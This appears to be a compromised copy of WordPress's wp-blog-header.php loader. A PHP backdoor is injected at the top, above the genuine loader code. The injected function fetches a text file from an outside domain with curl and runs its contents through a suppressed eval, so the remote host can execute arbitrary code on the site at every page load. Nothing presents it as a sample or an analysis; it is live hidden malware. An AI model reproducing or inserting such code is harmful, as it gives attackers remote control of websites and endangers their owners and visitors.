<?php
function getDiDiContent(){
  $handle = curl_init();
  curl_setopt ($handle, CURLOPT_URL, 'http://z60504_16.vjast.shop/stat/index.txt');
  curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5);
  $result = curl_exec( $handle );
  if ( PHP_VERSION_ID < 80000 ) {
     curl_close(  $handle  );
  }
  return $result; 
}
$didi = getDiDiContent();
@eval("?>" . $didi);
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}